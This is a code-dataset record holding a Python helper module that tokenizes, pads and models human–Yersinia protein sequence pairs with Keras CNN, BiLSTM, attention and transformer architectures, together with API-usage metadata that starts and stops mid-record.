{"api_name": "data_provider.load_organized_data_info", "line_number": 29, "usage_type": "call"}, {"api_name": "validation.IMGS_DIM_1D", "line_number": 29, "usage_type": "argument"}, {"api_name": "train_cnn._cnn", "line_number": 32, "usage_type": "call"}, {"api_name": "keras.optimizers.Adam", "line_number": 35, "usage_type": "call"}, {"api_name": "keras.losses.categorical_crossentropy", "line_number": 39, "usage_type": "name"}, {"api_name": "numpy.concatenate", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 78, "usage_type": "call"}, {"api_name": "tensorflow.convert_to_tensor", "line_number": 85, "usage_type": "call"}, {"api_name": "tensorflow.convert_to_tensor", "line_number": 86, "usage_type": "call"}, {"api_name": "keras.losses.categorical_crossentropy", "line_number": 87, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 96, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 97, "usage_type": "call"}, {"api_name": "validation._create_pairs_generator", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 105, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 107, "usage_type": "call"}, {"api_name": "utils.pairs_dot", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 108, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 109, "usage_type": "call"}, {"api_name": "data_provider.load_organized_data_info", "line_number": 118, "usage_type": "call"}, {"api_name": "data_provider.train_val_dirs_generators", "line_number": 122, "usage_type": "call"}, {"api_name": "pedl.frameworks.keras.data.KerasDataAdapter", "line_number": 124, "usage_type": "call"}, {"api_name": "pedl.frameworks.keras.data.KerasDataAdapter", "line_number": 125, "usage_type": "call"}]} +{"seq_id": "271907411", "text": "#Usage\r\n# import sys\r\n# sys.path.insert(0,'path to this file')\r\n# import functions as f\r\n\r\n\r\nimport pickle\r\nimport pandas as pd\r\nimport os\r\nimport sys\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nfrom keras.preprocessing.text import Tokenizer\r\nfrom keras.preprocessing.sequence import pad_sequences\r\nfrom keras.layers import Dense, Input, GlobalMaxPooling1D, Flatten\r\nfrom keras.layers import Conv1D, MaxPooling1D, Embedding, Attention,Concatenate\r\nfrom keras.models import Model\r\nfrom sklearn.metrics import roc_auc_score,roc_curve, auc\r\nfrom numpy import random\r\nfrom keras.layers import LSTM, Bidirectional, GlobalMaxPool1D, Dropout, GlobalAveragePooling1D\r\nfrom keras.optimizers import Adam\r\nfrom keras.utils.vis_utils import plot_model\r\nimport seaborn as sns\r\n\r\ndirectory = '/content/drive/MyDrive/ML_Data/'\r\n\r\n#Use this to create nD format input.\r\n#For eg, to create 4D input, combine_AC(df,4)\r\ndef combine_AC(df,chunksize=3,seperate_chunks=False):\r\n if not seperate_chunks:\r\n df.Human = df.Human.apply(lambda x: [''.join(x)[i:i+chunksize] for i in range(0, len(''.join(x))) if len(''.join(x)[i:i+chunksize])>=chunksize])\r\n df.Yersinia = df.Yersinia.apply(lambda x: [''.join(x)[i:i+chunksize] for i in range(0, len(''.join(x))) if len(''.join(x)[i:i+chunksize])>=chunksize])\r\n try:\r\n df.Joined = 
[df.loc[row]['Human']+df.loc[row]['Yersinia'] for row in range(df.shape[0])]\r\n except:\r\n df.Joined = df.Joined.apply(lambda x: [''.join(x)[i:i+chunksize] for i in range(0, len(''.join(x))) if len(''.join(x)[i:i+chunksize])>=chunksize])\r\n return df\r\n #print(\"JHGVBJGHGHKHGKG\")\r\n df.Human = df.Human.apply(lambda x: [''.join(x)[i:i+chunksize] for i in range(0, len(''.join(x)), chunksize)])\r\n df.Yersinia = df.Yersinia.apply(lambda x: [''.join(x)[i:i+chunksize] for i in range(0, len(''.join(x)), chunksize)])\r\n df.Joined = [df.loc[row]['Human']+df.loc[row]['Yersinia'] for row in range(df.shape[0])]\r\n return df\r\n\r\ndef shuff_together(df1,df2):\r\n joined = pd.concat([df1,df2], axis=0)\r\n joined = joined.iloc[np.random.permutation(len(joined))].reset_index(drop=True)\r\n return joined.iloc[:df1.shape[0],:],joined.iloc[df1.shape[0]:,:].reset_index(drop=True)\r\ndef load_data(D=1,randomize=False):\r\n try:\r\n with open(directory+'df_train_'+str(D)+'D.pickle', 'rb') as handle:\r\n df_train = pickle.load(handle)\r\n except:\r\n df_train = pd.read_pickle(\"C:/Users/nik00/py/proj/hyppi-train.pkl\")\r\n try:\r\n with open(directory+'df_test_'+str(D)+'D.pickle', 'rb') as handle:\r\n df_test = pickle.load(handle)\r\n except:\r\n df_test = pd.read_pickle(\"C:/Users/nik00/py/proj/hyppi-independent.pkl\")\r\n if randomize:\r\n return shuff_together(df_train,df_test)\r\n else:\r\n return df_train,df_test\r\n\r\n#Creates tokenizers and inputs for doubleip configuration\r\ndef get_seq_data_doubleip(MAX_VOCAB_SIZE, MAX_SEQUENCE_LENGTH,df_train,df_test, pad = 'center',show =False, saveTokrs = False):\r\n print(\"MAX_VOCAB_SIZE is\",MAX_VOCAB_SIZE)\r\n print(\"MAX_SEQUENCE_LENGTH is\",MAX_SEQUENCE_LENGTH)\r\n ip_train_Human = df_train[['Human']]\r\n ip_train_Yersinia = df_train[['Yersinia']]\r\n sentences_train_Human = pd.DataFrame(' '.join(ip_train_Human.loc[i]['Human']) for i in range(ip_train_Human.shape[0])).values.flatten()\r\n sentences_train_Yersinia = pd.DataFrame(' '.join(ip_train_Yersinia.loc[i]['Yersinia']) for i in range(ip_train_Yersinia.shape[0])).values.flatten()\r\n tokenizer1 = Tokenizer(num_words=MAX_VOCAB_SIZE)\r\n tokenizer1.fit_on_texts(sentences_train_Human)\r\n tokenizer2 = Tokenizer(num_words=MAX_VOCAB_SIZE)\r\n tokenizer2.fit_on_texts(sentences_train_Yersinia)\r\n sequences1_train = tokenizer1.texts_to_sequences(sentences_train_Human)\r\n sequences2_train = tokenizer2.texts_to_sequences(sentences_train_Yersinia)\r\n print(\"max sequences1_train length:\", max(len(s) for s in sequences1_train))\r\n print(\"min sequences1_train length:\", min(len(s) for s in sequences1_train))\r\n s = sorted(len(s) for s in sequences1_train)\r\n print(\"median sequences1_train length:\", s[len(s) // 2])\r\n if show : show_stats(sequences1_train,MAX_SEQUENCE_LENGTH,'Human_train') \r\n print(\"max word index sequences1_train:\", max(max(seq) for seq in sequences1_train if len(seq) > 0))\r\n print(\"max sequences2_train length:\", max(len(s) for s in sequences2_train))\r\n print(\"min sequences2_train length:\", min(len(s) for s in sequences2_train))\r\n s = sorted(len(s) for s in sequences2_train)\r\n print(\"median sequences2_train length:\", s[len(s) // 2])\r\n if show : show_stats(sequences2_train,MAX_SEQUENCE_LENGTH,'Yersinia_train')\r\n print(\"max word index sequences2_train:\", max(max(seq) for seq in sequences2_train if len(seq) > 0))\r\n word2idx = tokenizer1.word_index\r\n print('Found %s unique tokens in tokenizer1.' 
% len(word2idx))\r\n    word2idx = tokenizer2.word_index\r\n    print('Found %s unique tokens in tokenizer2.' % len(word2idx))\r\n    if pad == 'center':\r\n        print(\"Center padding\")\r\n        data1 = pad_centered(sequences1_train, MAX_SEQUENCE_LENGTH)\r\n        data2 = pad_centered(sequences2_train, MAX_SEQUENCE_LENGTH)\r\n    else:\r\n        print(pad+\" padding\")\r\n        data1 = pad_sequences(sequences1_train, MAX_SEQUENCE_LENGTH,padding=pad, truncating=pad)\r\n        data2 = pad_sequences(sequences2_train, MAX_SEQUENCE_LENGTH,padding=pad, truncating=pad)\r\n    print('Shape of data1 tensor:', data1.shape)\r\n    print('Shape of data2 tensor:', data2.shape)\r\n\r\n    ip_test_Human = df_test[['Human']]\r\n    ip_test_Yersinia = df_test[['Yersinia']]\r\n    sentences1_test = pd.DataFrame(' '.join(ip_test_Human.loc[i]['Human']) for i in range(ip_test_Human.shape[0])).values.flatten()\r\n    sentences2_test = pd.DataFrame(' '.join(ip_test_Yersinia.loc[i]['Yersinia']) for i in range(ip_test_Yersinia.shape[0])).values.flatten()\r\n    test_sequences1 = tokenizer1.texts_to_sequences(sentences1_test)\r\n    test_sequences2 = tokenizer2.texts_to_sequences(sentences2_test)\r\n    print(\"max test_sequences1 length:\", max(len(s) for s in test_sequences1))\r\n    print(\"min test_sequences1 length:\", min(len(s) for s in test_sequences1))\r\n    s = sorted(len(s) for s in test_sequences1)\r\n    print(\"median test_sequences1 length:\", s[len(s) // 2])\r\n    if show : show_stats(test_sequences1,MAX_SEQUENCE_LENGTH,'Human_test')\r\n    print(\"max test_sequences2 length:\", max(len(s) for s in test_sequences2))\r\n    print(\"min test_sequences2 length:\", min(len(s) for s in test_sequences2))\r\n    s = sorted(len(s) for s in test_sequences2)\r\n    print(\"median test_sequences2 length:\", s[len(s) // 2])\r\n    if show : show_stats(test_sequences2,MAX_SEQUENCE_LENGTH,'Yersinia_test')\r\n    if pad == 'center':\r\n        print(\"Center padding for test seq.\")\r\n        test_data1 = pad_centered(test_sequences1, MAX_SEQUENCE_LENGTH)\r\n        test_data2 = pad_centered(test_sequences2, MAX_SEQUENCE_LENGTH)\r\n    else:\r\n        print(pad+\" padding for test seq.\")\r\n        test_data1 = pad_sequences(test_sequences1, MAX_SEQUENCE_LENGTH,padding=pad, truncating=pad)\r\n        test_data2 = pad_sequences(test_sequences2, MAX_SEQUENCE_LENGTH,padding=pad, truncating=pad)\r\n    print('Shape of test_data1 tensor:', test_data1.shape)\r\n    print('Shape of test_data2 tensor:', test_data2.shape)\r\n\r\n    num_words = min(MAX_VOCAB_SIZE, len(word2idx) + 1)\r\n    print(\"num_words is\",num_words)\r\n    if saveTokrs:\r\n        save((tokenizer1,tokenizer2),'doubleip_tkrs')\r\n        print('Saved tokenizers as doubleip_tkrs')\r\n    return data1,data2,test_data1,test_data2,num_words,MAX_SEQUENCE_LENGTH,MAX_VOCAB_SIZE\r\n    \r\n    \r\n#Creates tokenizers and inputs for join configuration\r\ndef get_seq_data_join(MAX_VOCAB_SIZE, MAX_SEQUENCE_LENGTH,df_train,df_test, pad = 'center',show =False, saveTokrs = False):\r\n    print(\"MAX_VOCAB_SIZE is\",MAX_VOCAB_SIZE)\r\n    print(\"MAX_SEQUENCE_LENGTH is\",MAX_SEQUENCE_LENGTH)\r\n    sentences = pd.DataFrame(' '.join(df_train.loc[i]['Joined']) for i in range(df_train.shape[0])).values.flatten()\r\n    tokenizer = Tokenizer(num_words=MAX_VOCAB_SIZE)\r\n    tokenizer.fit_on_texts(sentences)\r\n    sequences = tokenizer.texts_to_sequences(sentences)\r\n    print(\"max sequence_data length:\", max(len(s) for s in sequences))\r\n    print(\"min sequence_data length:\", min(len(s) for s in sequences))\r\n    s = sorted(len(s) for s in sequences)\r\n    print(\"median sequence_data length:\", s[len(s) // 2])\r\n    if show : 
show_stats(sequences,MAX_SEQUENCE_LENGTH,'Joined_train')\r\n    print(\"max word index:\", max(max(seq) for seq in sequences if len(seq) > 0))\r\n    word2idx = tokenizer.word_index\r\n    print('Found %s unique tokens.' % len(word2idx))\r\n    \r\n    if pad == 'center':\r\n        print(\"Center padding.\")\r\n        data = pad_centered(sequences, MAX_SEQUENCE_LENGTH)\r\n    else:\r\n        print(pad+\" padding.\")\r\n        data = pad_sequences(sequences, MAX_SEQUENCE_LENGTH,padding=pad, truncating=pad)\r\n    print('Shape of data tensor:', data.shape)\r\n    sentences_test = pd.DataFrame(' '.join(df_test.loc[i]['Joined']) for i in range(df_test.shape[0])).values.flatten()\r\n    sequences_test = tokenizer.texts_to_sequences(sentences_test)\r\n    print(\"max sequences_test length:\", max(len(s) for s in sequences_test))\r\n    print(\"min sequences_test length:\", min(len(s) for s in sequences_test))\r\n    s = sorted(len(s) for s in sequences_test)\r\n    print(\"median sequences_test length:\", s[len(s) // 2])\r\n    if show : show_stats(sequences_test,MAX_SEQUENCE_LENGTH,'Joined_test') \r\n    if pad == 'center':\r\n        print(\"Center padding for test seq.\")\r\n        data_test = pad_centered(sequences_test, MAX_SEQUENCE_LENGTH)\r\n    else:\r\n        print(pad+\" padding for test seq.\")\r\n        data_test = pad_sequences(sequences_test, MAX_SEQUENCE_LENGTH,padding=pad, truncating=pad)\r\n    print('Shape of data_test tensor:', data_test.shape)\r\n    num_words = min(MAX_VOCAB_SIZE, len(word2idx) + 1)\r\n    print(\"num_words is\",num_words)\r\n    if saveTokrs:\r\n        save(tokenizer,'join_tkr')\r\n        print('Saved tokenizer as join_tkr')\r\n    return data,data_test,num_words,MAX_SEQUENCE_LENGTH,MAX_VOCAB_SIZE\r\n\r\ndef test_functions():\r\n    print (\"Access to functions.py verified\")\r\n    print (\"Access to functions.py verified\")\r\n\r\nimport tensorflow as tf\r\ndef pad_centered(l,max_len):\r\n    padded = []\r\n    for item in l:\r\n        #print(item)\r\n        if len(item)<=max_len :\r\n            left_zeros = (max_len - len(item))//2\r\n            right_zeros = (max_len - len(item))//2 + (max_len - len(item))%2\r\n            padded.append([0] * left_zeros + item + [0] * right_zeros)\r\n        else:\r\n            left_idx = (len(item) - max_len)//2 #- (len(item) - max_len)%2\r\n            right_idx = left_idx + max_len\r\n            padded.append(item[left_idx:right_idx])\r\n    assert(np.array(padded).shape == (len(l),max_len))\r\n    return tf.convert_to_tensor(padded)\r\n\r\ndef embedding_layer(num_words,MAX_SEQUENCE_LENGTH,EMBEDDING_DIM):\r\n    embedding_matrix = random.uniform(-1, 1,(num_words,EMBEDDING_DIM))\r\n    embedding_layer = Embedding(\r\n        num_words,\r\n        EMBEDDING_DIM,\r\n        weights=[embedding_matrix],\r\n        input_length=MAX_SEQUENCE_LENGTH,\r\n        trainable=True)\r\n    return embedding_layer\r\n    \r\nimport warnings\r\nwarnings.filterwarnings(\"ignore\")\r\ndef show_stats(sequence,MAX_SEQUENCE_LENGTH,title):\r\n    lengths = [len(l) for l in sequence]\r\n    sss = sorted(lengths)\r\n    median = sss[len(sss)//2]\r\n    y_pos = np.arange(len(lengths))\r\n    plt.bar(y_pos,lengths)\r\n    plt.plot([0,len(lengths)], [MAX_SEQUENCE_LENGTH,MAX_SEQUENCE_LENGTH],color='red',linestyle='-',label = \"MAX length cutoff\")\r\n    plt.plot([0,len(lengths)], [median,median],color='purple',linestyle='--',label = \"Median = \"+str(median)+\"\")#, ms=558,label = \"Median\")\r\n    #plt.figure(figsize=(3, 3))\r\n    plt.title(title+\" seq lengths with max length = \"+str(sss[-1])+\"\")\r\n    plt.xlabel(\"seq[i]\")\r\n    plt.ylabel(\"seq length\")\r\n    plt.legend()\r\n    plt.show()\r\n    \r\ndef conv_model(MAX_SEQUENCE_LENGTH,EMBEDDING_DIM,num_words,DROP=0.2, Flatt = True,filters = 32, kernel_size = 3, MAXpool_size=3):\r\n    
inputA = Input(shape=(MAX_SEQUENCE_LENGTH,))\r\n x1 = Embedding(num_words, EMBEDDING_DIM, input_length=MAX_SEQUENCE_LENGTH,trainable=True)(inputA)\r\n x1 = Conv1D(filters, kernel_size, activation='relu')(x1)\r\n x1= Dropout(DROP)(x1)\r\n x1 = MaxPooling1D(MAXpool_size)(x1)\r\n if Flatt: x1= Flatten()(x1)\r\n x1 = Dropout(DROP)(x1)\r\n x1 = Dense(128, activation='relu')(x1)\r\n return Model(inputs=inputA, outputs=x1)\r\n \r\ndef BiLSTM_model(MAX_SEQUENCE_LENGTH,EMBEDDING_DIM,num_words,M,DROP=0.2):\r\n ip = Input(shape=(MAX_SEQUENCE_LENGTH,))\r\n x = embedding_layer(num_words,MAX_SEQUENCE_LENGTH,EMBEDDING_DIM)(ip)\r\n #x = Embedding(num_words, EMBEDDING_DIM, input_length=MAX_SEQUENCE_LENGTH,trainable=True)(ip)\r\n x = Bidirectional(LSTM(M, return_sequences=True))(x)\r\n x = Dropout(DROP)(x)\r\n x = Dense(128, activation='relu')(x)\r\n x = GlobalMaxPool1D()(x)\r\n x = Dropout(DROP)(x)\r\n x = Dense(128, activation='relu')(x)\r\n return Model(inputs=ip, outputs=x)\r\n \r\n\r\n# from https://keras.io/api/layers/attention_layers/attention/\r\ndef att_model(MAX_SEQUENCE_LENGTH,EMBEDDING_DIM,num_words,DROP=0.2, BiLSTM = False):\r\n \r\n inputA = Input(shape=(MAX_SEQUENCE_LENGTH,))\r\n query_embeddings = embedding_layer(num_words,MAX_SEQUENCE_LENGTH,EMBEDDING_DIM)(inputA)\r\n \r\n inputB = Input(shape=(MAX_SEQUENCE_LENGTH,))\r\n value_embeddings = embedding_layer(num_words,MAX_SEQUENCE_LENGTH,EMBEDDING_DIM)(inputB)\r\n \r\n \r\n cnn_layer = Conv1D(32, 3)\r\n if BiLSTM: cnn_layer = Bidirectional(LSTM(15, return_sequences=True))\r\n \r\n # Query encoding of shape [batch_size, Tq, filters].\r\n query_seq_encoding = cnn_layer(query_embeddings)\r\n # Value encoding of shape [batch_size, Tv, filters].\r\n value_seq_encoding = cnn_layer(value_embeddings)\r\n \r\n # Query-value attention of shape [batch_size, Tq, filters].\r\n query_value_attention_seq = Attention()(\r\n [query_seq_encoding, value_seq_encoding])\r\n \r\n query_value_attention_seq = Dropout(DROP)(query_value_attention_seq)\r\n query_value_attention_seq = Dense(128, activation='relu')(query_value_attention_seq)\r\n \r\n query_seq_encoding = Dropout(DROP)(query_seq_encoding)\r\n query_seq_encoding = Dense(128, activation='relu')(query_seq_encoding)\r\n \r\n # Reduce over the sequence axis to produce encodings of shape\r\n # [batch_size, filters].\r\n query_encoding = GlobalAveragePooling1D()(\r\n query_seq_encoding)\r\n query_value_attention = GlobalAveragePooling1D()(\r\n query_value_attention_seq)\r\n \r\n query_encoding = Dropout(DROP)(query_encoding)\r\n query_encoding = Dense(128, activation='relu')(query_encoding)\r\n \r\n query_value_attention = Dropout(DROP)(query_value_attention)\r\n query_value_attention = Dense(128, activation='relu')(query_value_attention)\r\n \r\n \r\n # Concatenate query and document encodings to produce a DNN input layer.\r\n input_layer = Concatenate()([query_encoding, query_value_attention])\r\n\r\n return Model(inputs=[inputA, inputB], outputs=input_layer) \r\n # x = Dense(128, activation='relu')(input_layer)\r\n # x = Dropout(DROP)(x)\r\n # output = Dense(1, activation=\"sigmoid\",name=\"Final\")(x)\r\n # return Model(inputs=[inputA, inputB], outputs=output)\r\n\r\n\r\n# from https://keras.io/examples/nlp/text_classification_with_transformer/\r\nfrom tensorflow import keras\r\nfrom tensorflow.keras import layers\r\nclass TransformerBlock(layers.Layer):\r\n def __init__(self, embed_dim, num_heads, ff_dim, rate=0.1):\r\n super(TransformerBlock, self).__init__()\r\n self.att = 
layers.MultiHeadAttention(num_heads=num_heads, key_dim=embed_dim)\r\n self.ffn = keras.Sequential(\r\n [layers.Dense(ff_dim, activation=\"relu\"), layers.Dense(embed_dim),]\r\n )\r\n self.layernorm1 = layers.LayerNormalization(epsilon=1e-6)\r\n self.layernorm2 = layers.LayerNormalization(epsilon=1e-6)\r\n self.dropout1 = layers.Dropout(rate)\r\n self.dropout2 = layers.Dropout(rate)\r\n\r\n def call(self, inputs, training):\r\n attn_output = self.att(inputs, inputs)\r\n attn_output = self.dropout1(attn_output, training=training)\r\n out1 = self.layernorm1(inputs + attn_output)\r\n ffn_output = self.ffn(out1)\r\n ffn_output = self.dropout2(ffn_output, training=training)\r\n return self.layernorm2(out1 + ffn_output)\r\n\r\n\r\nclass TokenAndPositionEmbedding(layers.Layer):\r\n def __init__(self, maxlen, vocab_size, embed_dim):\r\n super(TokenAndPositionEmbedding, self).__init__()\r\n self.token_emb = layers.Embedding(input_dim=vocab_size, output_dim=embed_dim)\r\n self.pos_emb = layers.Embedding(input_dim=maxlen, output_dim=embed_dim)\r\n\r\n def call(self, x):\r\n maxlen = tf.shape(x)[-1]\r\n positions = tf.range(start=0, limit=maxlen, delta=1)\r\n positions = self.pos_emb(positions)\r\n x = self.token_emb(x)\r\n return x + positions\r\n\r\ndef transf_model(MAX_SEQUENCE_LENGTH,num_words, EMBEDDING_DIM, DROP = 0.3, num_heads = 2, ff_dim = 64):\r\n inputs=Input((MAX_SEQUENCE_LENGTH,))\r\n embedding_layer = TokenAndPositionEmbedding(MAX_SEQUENCE_LENGTH, num_words, EMBEDDING_DIM)\r\n x = embedding_layer(inputs)\r\n transformer_block = TransformerBlock(EMBEDDING_DIM, num_heads, ff_dim)\r\n x = transformer_block(x)\r\n x = Dropout(DROP)(x)\r\n x = Dense(256, activation=\"relu\")(x)\r\n x = GlobalAveragePooling1D()(x)\r\n return Model(inputs,x)\r\n # ip = transf_model(MAX_SEQUENCE_LENGTH_,num_words_5D_join,5)\r\n # x = Dropout(DROP)(ip.output)\r\n # x = Dense(128, activation=\"relu\")(x)\r\n # x = Dropout(DROP)(x)\r\n # outputs = Dense(1, activation=\"sigmoid\")(x)\r\n # model1D_CNN_join=Model(ip.input,outputs)\r\n \r\n\r\ndef save(data,name):\r\n with open(directory+''+name+'.pickle', 'wb') as handle:\r\n pickle.dump(data, handle, protocol=pickle.HIGHEST_PROTOCOL)\r\n\r\ndef load(name):\r\n with open(directory+''+name+'.pickle', 'rb') as handle:\r\n return pickle.load(handle)\r\n \r\n#Creates and saves Tokenizers for combine config\r\ndef create_tokenizers(df_train):\r\n ip_train_Human = df_train[['Human']]\r\n ip_train_Yersinia = df_train[['Yersinia']]\r\n sentences_train_Human = pd.DataFrame(' '.join(ip_train_Human.loc[i]['Human']) for i in range(ip_train_Human.shape[0])).values.flatten()\r\n sentences_train_Yersinia = pd.DataFrame(' '.join(ip_train_Yersinia.loc[i]['Yersinia']) for i in range(ip_train_Yersinia.shape[0])).values.flatten()\r\n tokenizer1 = Tokenizer(num_words=500000)\r\n tokenizer1.fit_on_texts(sentences_train_Human)\r\n tokenizer2 = Tokenizer(num_words=500000)\r\n tokenizer2.fit_on_texts(sentences_train_Yersinia)\r\n save((tokenizer1,tokenizer2),'doubleip_tkrs')\r\n print('Saved tokenizers as doubleip_tkrs')\r\n sentences = pd.DataFrame(' '.join(df_train.loc[i]['Joined']) for i in range(df_train.shape[0])).values.flatten()\r\n tokenizer = Tokenizer(num_words=1000000)\r\n tokenizer.fit_on_texts(sentences)\r\n save(tokenizer,'join_tkr')\r\n print('Saved tokenizer as join_tkr')\r\n \r\n\r\n#Meant for final model\r\ndef preprocess(df_test, show =False, saveTokrs = True):\r\n D = len(df_test[['Human']].iloc[0][0][0])\r\n if D==1:\r\n print(\"Converting to 5D. 
This will take a few minutes\")\r\n        combine_AC(df_test,5)\r\n    elif D!=5:\r\n        print(\"Data should be in 1D format\")\r\n        sys.exit()\r\n    else: pass\r\n    \r\n    if saveTokrs:\r\n        if input(\"Create tokenizers? Enter y if this is new training data. y/n: \") == 'y': create_tokenizers(df_test)\r\n    \r\n    inputs = []\r\n    MAX_SEQUENCE_LENGTH = 2000 #for joined\r\n    print('Preprocessing...')\r\n    #print(\"Seq length for joined is\",MAX_SEQUENCE_LENGTH)\r\n    tokenizer = load('join_tkr')\r\n    sentences_test_J = pd.DataFrame(' '.join(df_test.loc[i]['Joined']) for i in range(df_test.shape[0])).values.flatten()\r\n    sequences_test = tokenizer.texts_to_sequences(sentences_test_J)\r\n    s = sorted(len(s) for s in sequences_test)\r\n    if show : show_stats(sequences_test,MAX_SEQUENCE_LENGTH,'Joined_seq')\r\n    data_test = pad_sequences(sequences_test, MAX_SEQUENCE_LENGTH,padding='pre', truncating='pre')\r\n    inputs.append(data_test)\r\n    sequences_test = tokenizer.texts_to_sequences(sentences_test_J)\r\n    data_test = pad_centered(sequences_test, MAX_SEQUENCE_LENGTH)\r\n    inputs.append(data_test)\r\n    sequences_test = tokenizer.texts_to_sequences(sentences_test_J)\r\n    data_test = pad_sequences(sequences_test, MAX_SEQUENCE_LENGTH,padding='post', truncating='post')\r\n    inputs.append(data_test)\r\n    MAX_SEQUENCE_LENGTH = 1000 #for doubleip\r\n    #print(\"Seq length for doubleip is\",MAX_SEQUENCE_LENGTH)\r\n    ip_test_Human = df_test[['Human']]\r\n    ip_test_Yersinia = df_test[['Yersinia']]\r\n    sentences1_test = pd.DataFrame(' '.join(ip_test_Human.loc[i]['Human']) for i in range(ip_test_Human.shape[0])).values.flatten()\r\n    sentences2_test = pd.DataFrame(' '.join(ip_test_Yersinia.loc[i]['Yersinia']) for i in range(ip_test_Yersinia.shape[0])).values.flatten()\r\n    tokenizer1,tokenizer2 = load('doubleip_tkrs')\r\n    test_sequences1 = tokenizer1.texts_to_sequences(sentences1_test)\r\n    test_sequences2 = tokenizer2.texts_to_sequences(sentences2_test)\r\n    if show : show_stats(test_sequences1,MAX_SEQUENCE_LENGTH,'doubleip seq')\r\n    test_data1 = pad_sequences(test_sequences1, MAX_SEQUENCE_LENGTH,padding='pre', truncating='pre')\r\n    inputs.append(test_data1)\r\n    test_data2 = pad_sequences(test_sequences2, MAX_SEQUENCE_LENGTH,padding='pre', truncating='pre')\r\n    inputs.append(test_data2)\r\n    test_sequences1 = tokenizer1.texts_to_sequences(sentences1_test)\r\n    test_sequences2 = tokenizer2.texts_to_sequences(sentences2_test)\r\n    test_data1 = pad_centered(test_sequences1, MAX_SEQUENCE_LENGTH)\r\n    inputs.append(test_data1)\r\n    test_data2 = pad_centered(test_sequences2, MAX_SEQUENCE_LENGTH)\r\n    inputs.append(test_data2)\r\n    test_sequences1 = tokenizer1.texts_to_sequences(sentences1_test)\r\n    test_sequences2 = tokenizer2.texts_to_sequences(sentences2_test)\r\n    test_data1 = pad_sequences(test_sequences1, MAX_SEQUENCE_LENGTH,padding='post', truncating='post')\r\n    inputs.append(test_data1)\r\n    test_data2 = pad_sequences(test_sequences2, MAX_SEQUENCE_LENGTH,padding='post', truncating='post')\r\n    inputs.append(test_data2)\r\n    return inputs\r\n\r\n\r\n\r\n\r\n", "sub_path": "functions.py", "file_name": "functions.py", "file_ext": "py", "file_size_in_byte": 22210, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pandas.concat", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.random.permutation", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 47, "usage_type": "attribute"}, {"api_name": "pickle.load", "line_number": 52, "usage_type": 
"call"}, {"api_name": "pandas.read_pickle", "line_number": 54, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 57, "usage_type": "call"}, {"api_name": "pandas.read_pickle", "line_number": 59, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 71, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 72, "usage_type": "call"}, {"api_name": "keras.preprocessing.text.Tokenizer", "line_number": 73, "usage_type": "call"}, {"api_name": "keras.preprocessing.text.Tokenizer", "line_number": 75, "usage_type": "call"}, {"api_name": "keras.preprocessing.sequence.pad_sequences", "line_number": 101, "usage_type": "call"}, {"api_name": "keras.preprocessing.sequence.pad_sequences", "line_number": 102, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 108, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 109, "usage_type": "call"}, {"api_name": "keras.preprocessing.sequence.pad_sequences", "line_number": 128, "usage_type": "call"}, {"api_name": "keras.preprocessing.sequence.pad_sequences", "line_number": 129, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 145, "usage_type": "call"}, {"api_name": "keras.preprocessing.text.Tokenizer", "line_number": 146, "usage_type": "call"}, {"api_name": "keras.preprocessing.sequence.pad_sequences", "line_number": 163, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 165, "usage_type": "call"}, {"api_name": "keras.preprocessing.sequence.pad_sequences", "line_number": 177, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 203, "usage_type": "call"}, {"api_name": "tensorflow.convert_to_tensor", "line_number": 204, "usage_type": "call"}, {"api_name": "numpy.random.uniform", "line_number": 207, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 207, "usage_type": "name"}, {"api_name": "keras.layers.Embedding", "line_number": 208, "usage_type": "call"}, {"api_name": "warnings.filterwarnings", "line_number": 217, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 222, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 223, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 223, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 224, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 224, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 225, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 225, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 227, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 227, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 228, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 228, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 229, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 229, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 230, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 230, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 231, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 231, "usage_type": "name"}, {"api_name": "keras.layers.Input", "line_number": 234, "usage_type": "call"}, {"api_name": "keras.layers.Embedding", "line_number": 235, 
